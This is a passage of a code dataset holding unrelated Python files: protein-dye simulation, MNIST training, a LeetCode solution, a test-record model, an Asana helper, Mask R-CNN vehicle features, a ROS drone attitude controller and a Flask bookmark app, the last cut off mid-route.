datasets\n\"\"\"\nfor n in n_proteins:\n protein_folder=path_datasets_norm+str(n)+\"Prot/\"\n if not os.path.isdir(protein_folder): ##If folder doesnt exist\n os.mkdir(protein_folder)\n \n cleave_proteins(prot_fasta,protein_folder+\"peptides.csv\",\"trypsin\",n=n)\n dye_seqs_path=protein_folder+\"dye-seqs.tsv\";\n dye_seqs_from_peptides(protein_folder+\"peptides.csv\",\n ['DE','C','Y'],\n dye_seqs_path)\n dye_tracks_path=protein_folder+\"dye-tracks.tsv\";\n radiometries_path=protein_folder+\"radiometries.tsv\";\n true_ids_path=protein_folder+\"true-ids.tsv\";\n cmd_gen_dye_tracks = \"./bin/whatprot simulate dt -t 10 -g 1000 -P \" + seq_params_path + \" -S \" + dye_seqs_path + \" -T \" +dye_tracks_path;\n \n cmd_sim_rad = \"./bin/whatprot simulate rad -t 10 -g \"+str(n_reads_norm)+\" -P \" + seq_params_path + \" -S \" + dye_seqs_path + \" -R \" + radiometries_path + \" -Y \"+ true_ids_path \n \n subprocess.run(cmd_sim_rad, shell=True, check=True)\n subprocess.run(cmd_gen_dye_tracks, shell=True, check=True)\n #subprocess.run(cmd_sim_rad)\n\n\"\"\"\n\n#Generate long datasets:\nn_proteins_long=1000\nprotein_folder=path_datasets_long+str(n_proteins_long)+\"Prot/\"\nif not os.path.isdir(protein_folder): ##If folder doesnt exist\n os.mkdir(protein_folder)\n\ncleave_proteins(prot_fasta,protein_folder+\"peptides.csv\",\"trypsin\",n=n_proteins_long)\ndye_seqs_path=protein_folder+\"dye-seqs.tsv\";\ndye_seqs_from_peptides(protein_folder+\"peptides.csv\",\n ['DE','C','Y'],\n dye_seqs_path)\ndye_tracks_path=protein_folder+\"dye-tracks.tsv\";\nradiometries_path=protein_folder+\"radiometries.tsv\";\ntrue_ids_path=protein_folder+\"true-ids.tsv\";\ncmd_gen_dye_tracks = \"./bin/whatprot simulate dt -t 10 -g 1000 -P \" + seq_params_path + \" -S \" + dye_seqs_path + \" -T \" +dye_tracks_path;\n\ncmd_sim_rad = \"./bin/whatprot simulate rad -t 10 -g \"+str(n_reads_long)+\" -P \" + seq_params_path + \" -S \" + dye_seqs_path + \" -R \" + radiometries_path + \" -Y \"+ true_ids_path \n\nsubprocess.run(cmd_sim_rad, shell=True, check=True)\nsubprocess.run(cmd_gen_dye_tracks, shell=True, check=True)\n\n","repo_name":"JavierKipen/probeam","sub_path":"scripts/DatasetGen.py","file_name":"DatasetGen.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"31142190643","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\n\n# Load MNIST\nmnist = keras.datasets.mnist\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# Preprocess\nx_train = x_train / 255.0\nx_test = x_test / 255.0\n\n# Define\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(28, 28)),\n keras.layers.Dense(256, activation='relu'),\n keras.layers.Dropout(0.2),\n keras.layers.Dense(128, activation='relu'),\n keras.layers.Dropout(0.2),\n keras.layers.Dense(64, activation='relu'),\n keras.layers.Dropout(0.2),\n keras.layers.Dense(10, activation='softmax')\n])\n\n# Compile\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False),\n metrics=['accuracy'])\n\n# Data augmentation\ndatagen = keras.preprocessing.image.ImageDataGenerator(\n rotation_range=10,\n zoom_range=0.1,\n width_shift_range=0.1,\n height_shift_range=0.1\n)\n\ndatagen.fit(x_train[..., np.newaxis])\n\n# Callback\nearly_stopping = keras.callbacks.EarlyStopping(patience=5, restore_best_weights=True)\nmodel_checkpoint = keras.callbacks.ModelCheckpoint(\"mnist_best_model.h5\", save_best_only=True)\n\n# Train model\nhistory = model.fit(datagen.flow(x_train[..., np.newaxis], y_train, batch_size=32),\n epochs=50, validation_data=(x_test[..., np.newaxis], y_test),\n callbacks=[early_stopping, model_checkpoint])\n\n# Evaluation model\ntest_loss, test_acc = model.evaluate(x_test[..., np.newaxis], y_test, verbose=2)\nprint('Test accuracy:', test_acc)\n\n# Load saved model\nloaded_model = keras.models.load_model(\"mnist_best_model.h5\")\n\n#predictions w/ loaded model\npredictions = loaded_model.predict(x_test[..., np.newaxis])\npredicted_classes = np.argmax(predictions, axis=1)\n\n# Display confusion matrix\nconf_mat = confusion_matrix(y_test, predicted_classes)\nprint(\"Confusion Matrix:\")\nprint(conf_mat)\n\n# Plot\nplt.matshow(conf_mat, cmap=plt.cm.gray)\nplt.xlabel(\"Predicted labels\")\nplt.ylabel(\"True labels\")\nplt.show()\n","repo_name":"Haydens-workshop/Training-model","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"29886323735","text":"from leetcode import ListNode\r\n\r\nclass Solution:\r\n\tdef removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\r\n\t\tnil = ListNode(0)\r\n\t\tnil.next = head\r\n\r\n\t\tdef dfs(prev, cur):\r\n\t\t\tif cur is None:\r\n\t\t\t\treturn 1\r\n\t\t\tidx = dfs(cur, cur.next)\r\n\t\t\tprint(cur.val, idx)\r\n\t\t\tif idx == n:\r\n\t\t\t\tprev.next = cur.next\r\n\t\t\treturn idx + 1\r\n\r\n\t\tdfs(nil, head)\r\n\t\treturn nil.next\r\n","repo_name":"linsinn/algorithms","sub_path":"others/src/leetcode/lc19.py","file_name":"lc19.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"35979846234","text":"import logging\n\nfrom testtools.testresult.real import (\n FINAL_STATES,\n STATES,\n)\n\nfrom obsub import event\n\nfrom testconsole.testtools import (\n INPROGRESS,\n EXISTS,\n)\n\n\nclass Repository(object):\n \"\"\"Hold information about a collection of test records.\"\"\"\n\n def __init__(self):\n self._index = {}\n self._counts = {state: 0 for state in STATES - {None}}\n\n def get_record(self, test_id):\n \"\"\"Return the test case with the given ID.\"\"\"\n return self._index.get(test_id)\n\n def add_record(self, record):\n \"\"\"Add a new test record to the repository.\n\n If a test record with the same ID already exists, it will be silently\n overwritten.\n \"\"\"\n logging.debug(\"Add test record '%s'\", record.id)\n if record.id in self._index and record.runnable:\n logging.warning(\n \"Runnable test record '%s' exists, skipping it\", record.id)\n return\n self.update_record(record)\n\n def update_record(self, record):\n \"\"\"Update the given record.\n\n :param record: A TestRecord that already exists in the repository.\n \"\"\"\n # TODO: The code below assumes that the packets in the subunit stream\n # are ordered in a deterministic and predictable way. E.g.:\n #\n # - the stream starts with a series of packets with status 'exists'\n # each one associate with a test that is going to be run.\n #\n # - then test records sequentially transition from 'exists' to\n # 'inprogress' and then a final status (each transition happens\n # only once and it's not interleaved with packets associated with\n # other test cases)\n #\n # - x-log and x-traceback packets have no status and have a test ID\n # that always matches the test ID of the currently 'inprogress' test\n # case.\n #\n # These assumption are consistent with subunit.v2.StreamResultToBytes\n # and with subunitlogging.SubunitLoggingSuite.\n #\n # However at some point we might want to be more defensive, introducing\n # logic to spot and possibly resolve inconsistencies.\n self._index[record.id] = record\n\n if record.status:\n if record.status not in STATES:\n logging.warning(\"Unknown status '%s'\", record.status)\n return\n\n # Runnable records are associated with actual test cases, so we\n # want to update the counts (non runnable records are typically\n # associated with fixtures and resources).\n if record.runnable:\n previous_status = self._get_previous_status(record.status)\n if previous_status:\n self._counts[previous_status] -= 1\n assert self._counts[previous_status] >= 0\n self._counts[record.status] += 1\n self.on_counts_change()\n\n if record.status == INPROGRESS:\n logging.debug(\"Start: '%s'\", record.id)\n self.on_record_start(record)\n elif record.status in FINAL_STATES - {EXISTS}:\n logging.debug(\"Finish: '%s' -> '%s'\", record.id, record.status)\n\n elif record.details:\n logging.debug(\"Record '%s' has new progress data\", record.id)\n self.on_record_progress(record)\n\n def count_records(self, states=STATES):\n \"\"\"Return the number of runnable records in the given states.\n\n The default is to return the count of all runnable records (i.e. in\n all states).\n \"\"\"\n return sum([\n self._counts[state] for state in self._counts if state in states])\n\n @event\n def on_counts_change(self):\n \"\"\"Notifier triggering when status counts change.\"\"\"\n\n @event\n def on_record_start(self, record):\n \"\"\"Notifier triggering when a new test gets started.\"\"\"\n\n @event\n def on_record_progress(self, record):\n \"\"\"Notifier triggering when receiving all packets for a detail.\"\"\"\n\n def _get_previous_status(self, status):\n if status == EXISTS:\n return None\n elif status == INPROGRESS:\n return EXISTS\n elif status in FINAL_STATES - {EXISTS}:\n return INPROGRESS\n","repo_name":"freeekanayaka/testconsole","sub_path":"testconsole/model/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"27563492654","text":"import configparser\nimport json\nimport os\n\n\nclass User(object):\n parent = None\n api_base_url = None\n\n user_id = None\n\n def __init__(self, parent):\n config = configparser.ConfigParser()\n config.read(\"main.ini\")\n\n self.global_config = {s: dict(config.items(s)) for s in config.sections()}\n\n self.parent = parent\n\n def get_me(self):\n return self.parent.client.users.me()\n\n def write_user_file(self):\n if \"api.\"+self.parent.requests_api.provider_name+\".Files\" in self.global_config.keys():\n file_basepath = self.global_config[\"api.\" + self.parent.requests_api.provider_name][\"file_basepath\"]\n me_file = self.global_config[\"api.\"+self.parent.requests_api.provider_name+\".Files\"][\"user\"]\n target_filepath = os.path.join(os.getcwd(), file_basepath, \"user_\"+str(self.user_id), me_file)\n\n if os.path.isdir(os.path.dirname(target_filepath)):\n data_ = json.dumps(self.parent.user.to_json(), indent=4)\n if not os.path.isfile(target_filepath):\n with open(target_filepath, \"w\", encoding=\"utf-8\") as me_json_f:\n me_json_f.write(data_)\n me_json_f.close()\n else:\n\n with open(target_filepath, encoding=\"utf-8\") as me_json_read:\n if me_json_read.read().strip() != data_.strip():\n with open(target_filepath, \"w\",\n encoding=\"utf-8\") as me_json_f:\n me_json_f.write(json.dumps(self.parent.user.workspaces, indent=4))\n me_json_f.close()\n else:\n print(\"no change: \" + me_file)\n me_json_read.close()\n","repo_name":"Izzy3110/python3-asana-api","sub_path":"wyl/api/asana/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"40631262362","text":"import os\nimport torch\nimport numpy as np\nimport torch.utils.data\nfrom PIL import Image\nimport torchvision\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.models.detection.mask_rcnn import MaskRCNNPredictor\nimport cv2\nimport math\nimport glob\nimport pickle\nclass_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',\n 'bus', 'train', 'truck', 'boat', 'traffic light',\n 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',\n 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',\n 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',\n 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',\n 'kite', 'baseball bat', 'baseball glove', 'skateboard',\n 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',\n 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',\n 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',\n 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',\n 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',\n 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',\n 'teddy bear', 'hair drier', 'toothbrush']\ncolors=[[np.random.randint(0,255),np.random.randint(0,255),np.random.randint(0,255)]for i in range(100)]\n#为了最终实例分割显示明显,定义常见类别为深色\ncolors[3]=[0,0,255] #car\ncolors[6]=[0,0,255] #bus\ncolors[8]=[0,0,255] #truck\n\nclass_need = ['car','truck', 'bus']\n\ndef compute_distance(center0, center1):\n return math.sqrt(math.pow((center1[0]-center0[0]),2) + math.pow((center1[1]-center0[1]),2))\n\ndef demo():\n img_dir='/data4/mjx/gd/datasets'\n test_dir = '/data4/mjx/gd/dataset_raw/test/'\n # load an instance segmentation model pre-trained on COCO\n device = torch.device('cuda:2')\n model = torchvision.models.detection.maskrcnn_resnet50_fpn()\n state_dict = torch.load('maskrcnn_resnet50_fpn_coco-bf2d0c1e.pth')\n model.load_state_dict(state_dict)\n model.to(device)\n # imgs=os.listdir(img_dir)\n imgs = glob.glob(test_dir+'/*/*')\n \n all_info = {}\n\n for pic_idx in range(len(imgs)):\n \n img_info = {}\n img_info['box_0_min'], img_info['box_1_min'], img_info['box_2_max'], img_info['box_3_max'] = {}, {}, {}, {}\n \n img_info['car_num'] = {}\n img_info['box_center_gap_mean'] = {}\n img_info['box_center_gap_max'] = {}\n img_info['box_center_gap_min'] = {}\n img_info['box_center_gap_std'] = {}\n img_info['box_center_gap_range'] = {}\n\n img_info['last_distance'] = {}\n\n img_info['mask_area_mean'] = {}\n img_info['mask_area_max'] = {}\n img_info['mask_area_min'] = {}\n img_info['mask_area_std'] = {}\n img_info['mask_area_range'] = {}\n img_info['mask_area_all'] = {}\n img_info['mask_road'] = {}\n\n distance = []\n box_0, box_1, box_2, box_3 = [], [], [], []\n box_center = []\n mask_area = []\n car_num_temp = 0\n imgsrc=cv2.imread(imgs[pic_idx])\n all_cls_mask_color = np.zeros_like(imgsrc)\n all_cls_mask_index=np.zeros_like(imgsrc)\n h,w,c = imgsrc.shape\n img = imgsrc / 255.\n img=np.transpose(img, (2, 0, 1))\n img=torch.tensor(img,dtype=torch.float)\n # put the model in evaluation mode\n model.eval()\n \n with torch.no_grad():\n prediction = model([img.to(device)])\n # print(prediction)\n \n scores =prediction[0]['scores']\n for idx,score in enumerate(scores):\n mask=prediction[0]['masks'][idx][0].cpu().numpy()\n mask=mask>0.5\n cls_id=prediction[0]['labels'][idx].item()\n mask_size = (all_cls_mask_index[mask]==1).size\n boxes =prediction[0]['boxes'][idx].cpu().numpy()\n if score > 0.5 and cls_id < 81 \\\n and class_names[cls_id] in class_need \\\n and mask_size < 100000 \\\n and boxes[0] > 0.2 * w:\n car_num_temp += 1\n mask_area.append(mask_size)\n box_0.append(boxes[0])\n box_1.append(boxes[1])\n box_2.append(boxes[2])\n box_3.append(boxes[3])\n box_center.append(((boxes[0]+boxes[2])/2, (boxes[1]+boxes[3])/2))\n # labels =prediction[0]['labels']\n # all_cls_mask_color[mask]=colors[cls_id]\n # all_cls_mask_index[mask]=1\n \n # cv2.rectangle(imgsrc, (boxes[0], boxes[1]), (boxes[2], boxes[3]), (255, 0, 0), 1)\n # cv2.putText(imgsrc, class_names[cls_id], (int(boxes[0]),int(boxes[1]-10)), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 0), 1)\n \n img_name = imgs[pic_idx].split('/')[-1]\n \n img_info['box_0_min'] = min(box_0) if box_0 else 0\n img_info['box_1_min'] = min(box_1) if box_1 else 0\n img_info['box_2_max'] = max(box_2) if box_2 else 0\n img_info['box_3_max'] = max(box_3) if box_3 else 0\n img_info['last_distance'] = h - max(box_3) if box_3 else 0\n img_info['car_num'] = car_num_temp\n for i in range(len(box_center)):\n for j in range(i+1, len(box_center)):\n distance.append(compute_distance(box_center[i], box_center[j]))\n \n img_info['box_center_gap_min'] = min(distance) if distance else 0\n img_info['box_center_gap_max'] = max(distance) if distance else 0\n img_info['box_center_gap_mean'] = np.mean(distance) if distance else 0\n img_info['box_center_gap_std'] = np.std(distance) if distance else 0\n img_info['box_center_gap_range'] = max(distance) - min(distance) if distance else 0\n \n\n img_info['mask_area_max'] = max(mask_area) if mask_area else 0\n img_info['mask_area_min'] = min(mask_area) if mask_area else 0\n img_info['mask_area_mean'] = np.mean(mask_area) if mask_area else 0\n img_info['mask_area_std'] = np.std(mask_area) if mask_area else 0\n img_info['mask_area_range'] = max(mask_area) - min(mask_area) if mask_area else 0\n img_info['mask_area_all'] = sum(mask_area) if mask_area else 0\n img_info['mask_road'] = (w*h/2) - sum(mask_area) if mask_area else 0\n\n all_info[img_name] = img_info\n \n with open('test_dection_info.pkl', 'wb') as f:\n pickle.dump(all_info, f)\n\n\n # img_weight=cv2.addWeighted(imgsrc,0.4,all_cls_mask_color,0.6,0)#线性混合\n # all_mask=all_cls_mask_index==1\n # result=np.copy(imgsrc)\n # result[all_mask]=img_weight[all_mask] #只取mask的混合部分\n # union = np.concatenate((imgsrc,result),axis=1)\n # cv2.imwrite(os.path.join('./seg_res',img_name),result)\n # print(box_0_min, box_1_min, box_2_max, box_3_max)\n # break\n\ndemo()\n","repo_name":"majx1997/GD-final","sub_path":"script/seg.py","file_name":"seg.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"32453366586","text":"#!/usr/bin/env python\n\nimport rospy\nimport numpy\nimport math\n\nfrom geometry_msgs.msg import PoseStamped, Vector3\nfrom mavros_msgs.msg import State, AttitudeTarget\nfrom clever.srv import Navigate\nfrom mavros_msgs.srv import CommandBool, SetMode\nfrom std_srvs.srv import Trigger\nfrom tf.transformations import quaternion_from_euler, euler_from_quaternion, euler_matrix\n\nfrom threading import Lock\n\n#--- parameters --#\n\nrospy.init_node('rps_offboard')\nrospy.loginfo('initializing rps_offboard...')\n\nlock = Lock()\nAT = AttitudeTarget\nland_timeout = 2\n\ncoeffs = {}\ncoeffs['thrust_0'] = float(rospy.get_param('~thrust_0'))\ncoeffs['thrust_D'] = float(rospy.get_param('~thrust_D'))\ncoeffs['thrust_P'] = float(rospy.get_param('~thrust_P'))\ncoeffs['thrust_I'] = float(rospy.get_param('~thrust_I'))\ncoeffs['pitch_0'] = float(rospy.get_param('~pitch_0'))\ncoeffs['pitch_D'] = float(rospy.get_param('~pitch_D')) \ncoeffs['pitch_P'] = float(rospy.get_param('~pitch_P'))\ncoeffs['pitch_I'] = float(rospy.get_param('~pitch_I'))\ncoeffs['pitch_max'] = float(rospy.get_param('~pitch_max'))\ncoeffs['roll_0'] = float(rospy.get_param('~roll_0'))\ncoeffs['roll_D'] = float(rospy.get_param('~roll_D'))\ncoeffs['roll_P'] = float(rospy.get_param('~roll_P'))\ncoeffs['roll_I'] = float(rospy.get_param('~roll_I'))\ncoeffs['roll_max'] = float(rospy.get_param('~roll_max'))\n\ncamera_angle = float(rospy.get_param('~camera_angle'))\ntakeoff_time = float(rospy.get_param('~takeoff_time'))\nhold_yaw = bool(rospy.get_param('~hold_yaw'))\n\n#--- functions ---#\n\n\ndef get_state(data):\n\tglobal state\n\tstate = data\n\n\ndef get_att(data):\n\tglobal att\n\tq = [0 for i in range(4)]\n\n\tq[0] = data.pose.orientation.x\n\tq[1] = data.pose.orientation.y\n\tq[2] = data.pose.orientation.z\n\tq[3] = data.pose.orientation.w\n\tatt = euler_from_quaternion(q)\n\n\ndef get_position(data):\n\tglobal pose, Ix, Iy, Iz, pose_list\n\n\tif data.header.frame_id != '':\n\t\tpose = [data.pose.position.x, data.pose.position.y, data.pose.position.z]\n\telse:\n\t\tpose = None\n\t\tpose_list = None\n\t\tIx, Iy, Iz = 0, 0, 0\n\n\ndef transform_frame(vec, att):\n\n\t# from 'main_camera' to 'fcu'\n\ta = camera_angle\n\tvec[0], vec[1], vec[2] = vec[1]*math.cos(a) + vec[2]*math.sin(a), -vec[0], vec[2]*math.cos(a) - vec[1]*math.sin(a)\n\n\t# from 'fcu' to 'fcu_horiz'\n\troll, pitch = att[0], att[1]\t\n\trmat = euler_matrix(roll, pitch, 0, 'rxyz')\n\trmat = rmat[0:3, 0:3]\n\tvec = numpy.array([[vec[0]],[vec[1]],[vec[2]]])\n\tvec = rmat.dot(vec)\n\n\treturn float(vec[0]), float(vec[1]), float(vec[2])\n\n\ndef get_PID(Px, Py, Pz):\n\tglobal pose_list, Ix, Iy, Iz\n\n\t# calculate P\n\tif pose_list is None:\n\t\tpose_list = [[Px, Py, Pz] for i in range(5)]\n\t\tPx_0, Py_0, Pz_0 = Px, Py, Pz\n\telse:\n\t\tpl = [pose_list[i + 1] for i in range(4)]\n\t\tpl = pl + [[Px, Py, Pz]]\n\t\tpose_list = pl\n\n\t\tsum_0 = [0, 0, 0]\n\t\tsum = [0, 0, 0]\n\t\tfor i in range(3):\n\t\t\tfor j in range(4):\n\t\t\t\tsum_0[i] += pl[j][i]\n\t\t\tfor j in range(1, 5):\n\t\t\t\tsum[i] += pl[j][i]\n\n\t\tPx_0, Py_0, Pz_0 = sum_0[0]/4, sum_0[1]/4, sum_0[2]/4\n\t\tPx, Py, Pz = sum[0]/4, sum[1]/4, sum[2]/4\n\n\t# calculate I\n\tIx += 0.01*Px\n\tIy += 0.01*Py\n\tIz += 0.01*Pz\n\n\t# calculate D\n\tDx, Dy, Dz = Px - Px_0, Py - Py_0, Pz - Pz_0\n\n\treturn Px, Py, Pz, Ix, Iy, Iz, Dx, Dy, Dz\n\n\ndef calculate_setpoint(att, pose, sp_pose, sp_yaw):\n\n\t# calculate PID in frame 'fcu_horiz'\n\n\tpose = list(pose)\n\tx, y, z = transform_frame(pose, att)\n\tsx, sy, sz = sp_pose[0], sp_pose[1], sp_pose[2]\n\n\tPx, Py, Pz, Ix, Iy, Iz, Dx, Dy, Dz = get_PID(x + sx, y + sy, z + sz)\t\n\tprint('Px = {0:.2f}, Py = {1:.2f}, Pz = {2:.2f}'.format(Px, Py, Pz))\n\n\t# calculate attitude\n\n\troll = coeffs['roll_0'] + Dy*coeffs['roll_D'] + Py*coeffs['roll_P'] + Iy*coeffs['roll_I']\n\tif abs(roll) > coeffs['roll_max']:\n\t\troll = math.copysign(coeffs['roll_max'], roll)\n\n\tpitch = coeffs['pitch_0'] - Dx*coeffs['pitch_D'] - Px*coeffs['pitch_P'] - Ix*coeffs['pitch_I']\n\tif abs(pitch) > coeffs['pitch_max']:\n\t\tpitch = math.copysign(coeffs['pitch_max'], pitch)\n\n\tif hold_yaw:\n\t\tyaw = sp_yaw\n\telse:\n\t\tyaw = att[2]\n\n\tprint('sp_yaw = {0:.2f} '.format(yaw))\n\tsp_att = [roll, pitch, yaw] # roll, pitch, yaw \n\n\t# calculate thrust\n\t\n\tsp_thrust = coeffs['thrust_0'] - Dz*coeffs['thrust_D'] - Pz*coeffs['thrust_P'] - Iz*coeffs['thrust_I']\n\tif sp_thrust < 0:\n\t\tsp_thrust = 0\n\tif sp_thrust > 1:\n\t\tsp_thrust = 1\n\tprint('roll = {0:.2f}, pitch = {1:.2f}, yaw = {2:.2f}, thrust = {3:.2f}'.format(roll, pitch, att[2], sp_thrust))\n\t\n\treturn sp_att, sp_thrust\n\n\ndef get_message(sp_att, sp_thrust):\n\n\tmsg = AttitudeTarget()\n\tmsg.header.stamp = rospy.get_rostime() \n\tmsg.type_mask = AT.IGNORE_ROLL_RATE + AT.IGNORE_PITCH_RATE + AT.IGNORE_YAW_RATE\n\n\tq = quaternion_from_euler(sp_att[0],sp_att[1],sp_att[2])\n\tmsg.orientation.x = q[0]\n\tmsg.orientation.y = q[1]\n\tmsg.orientation.z = q[2]\n\tmsg.orientation.w = q[3]\n\tmsg.thrust = sp_thrust\n\n\treturn msg\n\n\ndef offboard_and_arm(auto_arm):\n\tglobal state\n\n\t# switch mode to 'OFFBOARD'\n\tif state.mode != 'OFFBOARD':\n\t\trospy.sleep(0.2)\n\t\tset_mode(0, 'OFFBOARD')\n\t\trospy.loginfo('Switch mode to \"OFFBOARD\"')\n\n\t# arming\n\tif (not state.armed) and (auto_arm):\n\t\tarming(True)\n\t\trospy.loginfo('Arming')\n\n#--- services ---#\n\ndef navigate(data):\n\tglobal att, pose, sp_pose, sp_yaw, takeoff_cnt\n\n\tif data.frame_id != 'fcu_horiz':\n\t\trospy.logwarn('sp_pose must be given in \"fcu_horiz\" ')\n\t\treturn {'message': 'sp_pose must be given in \"fcu_horiz\" '}\n\n\ttry:\n\t\twith lock:\n\t\t\tsp_pose = [data.x, data.y, data.z]\n\t\t\t\n\t\t\ttakeoff_cnt = 0\n\n\t\t\tsp_yaw = att[2]\n\t\t\tsp_att = [coeffs['roll_0'], coeffs['pitch_0'], sp_yaw]\n\t\t\tsp_thrust = coeffs['thrust_0'] \n\n\t\t\tmsg = get_message(sp_att, sp_thrust)\n\t\t\tatt_pub.publish(msg)\n\n\t\t\toffboard_and_arm(data.auto_arm)\n\n\t\trospy.loginfo('rps_offboard: navigate')\n\t\treturn {'success': True}\n\n\texcept Exception as e:\n\t\trospy.logerr(str(e))\n\t\treturn {'success': False, 'message': str(e)}\n\n\ndef land(data):\n\tglobal state, sp_pose, Ix, Iy, Iz\n\n\tland_cnt = 0\n\twhile (state.mode != 'AUTO.LAND') and (land_cnt < 10*land_timeout):\n\t\tset_mode(0,'AUTO.LAND')\n\t\trospy.sleep(0.1)\n\t\tland_cnt += 1\n\n\tif land_cnt == 10*land_timeout:\n\t\trospy.loginfo('\"AUTO.LAND\" timeout')\n\t\treturn {'success': False}\n\telse:\n\t\tIx, Iy, Iz = 0, 0, 0\n\t\tsp_pose = None\n\t\trospy.loginfo('Switch mode to \"AUTO.LAND\"')\n\t\treturn {'success': True}\n\n\ndef release(data):\n\tglobal sp_pose, Ix, Iy, Iz\n\n\tIx, Iy, Iz = 0, 0, 0\n\tsp_pose = None\n\trospy.loginfo('rps_offboard: release')\n\treturn {'success': True}\n\n#--- main loop ---#\n\ndef loop():\n\tglobal att, pose, sp_pose, sp_yaw, takeoff_cnt\n\tr = rospy.Rate(10)\n\n\twhile not rospy.is_shutdown():\n\t\tif not (sp_pose is None):\n\t\t\twith lock:\n\t\t\t\tif (pose is None):\n\t\t\t\t\tsp_att = [coeffs['roll_0'], coeffs['pitch_0'], sp_yaw]\n\t\t\t\t\tsp_thrust = coeffs['thrust_0']\n\t\t\t\t\tprint('no pose')\n\n\t\t\t\telif takeoff_cnt is None:\n\t\t\t\t\tsp_att, sp_thrust = calculate_setpoint(att, pose, sp_pose, sp_yaw)\n\t\t\t\telse:\n\t\t\t\t\tsp_att = [coeffs['roll_0'], coeffs['pitch_0'], sp_yaw]\n\t\t\t\t\tsp_thrust = coeffs['thrust_0']\n\n\t\t\t\t\tprint('taking off...')\n\t\t\t\t\ttakeoff_cnt += 1\n\t\t\t\t\tif takeoff_cnt >= takeoff_time*10:\n\t\t\t\t\t\ttakeoff_cnt = None\n\n\t\t\t\tmsg = get_message(sp_att, sp_thrust)\n\t\t\t\tatt_pub.publish(msg)\n\n\t\tr.sleep()\n\n#--- actions ---#\n\natt = [0, 0, 1.57]\npose = None \nsp_pose = None\nsp_yaw = 1.57\nstate = None\n\npose_list = None\nIx, Iy, Iz = 0, 0, 0 \ntakeoff_cnt = None\n\nstate_sub = rospy.Subscriber('/mavros/state', State, get_state)\npose_sub = rospy.Subscriber('/RPS/pose', PoseStamped, get_position)\natt_sub = rospy.Subscriber('/mavros/local_position/pose', PoseStamped, get_att) \n\natt_pub = rospy.Publisher('/mavros/setpoint_raw/attitude', AttitudeTarget, queue_size=1)\n\nset_mode = rospy.ServiceProxy('/mavros/set_mode', SetMode, persistent=True)\narming = rospy.ServiceProxy('/mavros/cmd/arming', CommandBool, persistent=True)\n\nrospy.Service('navigate', Navigate, navigate)\nrospy.Service('land', Trigger, land)\nrospy.Service('release', Trigger, release)\n\nrospy.loginfo('rps_offboard inited')\nloop()\n","repo_name":"PhystechPozitron/COSCO-RPS","sub_path":"RPS/rps_offboard.py","file_name":"rps_offboard.py","file_ext":"py","file_size_in_byte":7835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"3305677904","text":"from flask import Flask, render_template, request, redirect, url_for, flash, abort\nfrom flask_login import login_required, login_user, current_user, logout_user\n# from .forms import BookmarkForm, LoginForm, SignupForm\nfrom my_project import forms\nfrom my_project import app, db, login_manager\nfrom my_project import models\n\n\n\n@login_manager.user_loader\ndef load_user(userid):\n return models.User.query.get(int(userid))\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template('index.html', new_bookmarks = models.Bookmark.newest(5))\n\n@app.route('/add', methods= ['GET', 'POST'])\n@login_required\ndef add():\n form = forms.BookmarkForm()\n if form.validate_on_submit():\n url = form.url.data\n description = form.description.data\n tags = form.tags.data \n bm = models.Bookmark(user=current_user, url=url, description=description, tags=tags)\n \n # db.session.add(bm)\n current_db_sessions = db.session.object_session(bm)\n current_db_sessions.add(bm)\n # db.session.add(bm)\n db.session.commit()\n # store_bookmarks(url, description)\n flash(\"Stored '{}'\".format(bm.description))\n return redirect(url_for('index'))\n return render_template('bookmark_form.html', form=form, title=\"Add Bookmark\")\n\n\n@app.route('/edit/', methods=[\"GET\", \"POST\"])\n@login_required\ndef edit(bookmark_id):\n bookmark = models.Bookmark.query.get_or_404(bookmark_id)\n if current_user != bookmark.user:\n abort(403)\n form = forms.BookmarkForm(obj=bookmark)\n if form.validate_on_submit():\n form.populate_obj(bookmark)\n\n # current_user.url = form.url.data\n # current_user.description = form.description.data\n # db.session.add(current_user._get_current_object())\n db.session.commit()\n flash(f\"Updated bookmark is {bookmark.description}\")\n return redirect(url_for('user', username=current_user.username))\n return render_template('bookmark_form.html', form=form, title=\"Edit bookmark\")\n\n\n@app.route('/delete/', methods=['GET', 'POST'])\n@login_required\ndef delete_bookmark(bookmark_id):\n bookmark = models.Bookmark.query.get_or_404(bookmark_id)\n if current_user != bookmark.user:\n abort(403)\n if request.method == 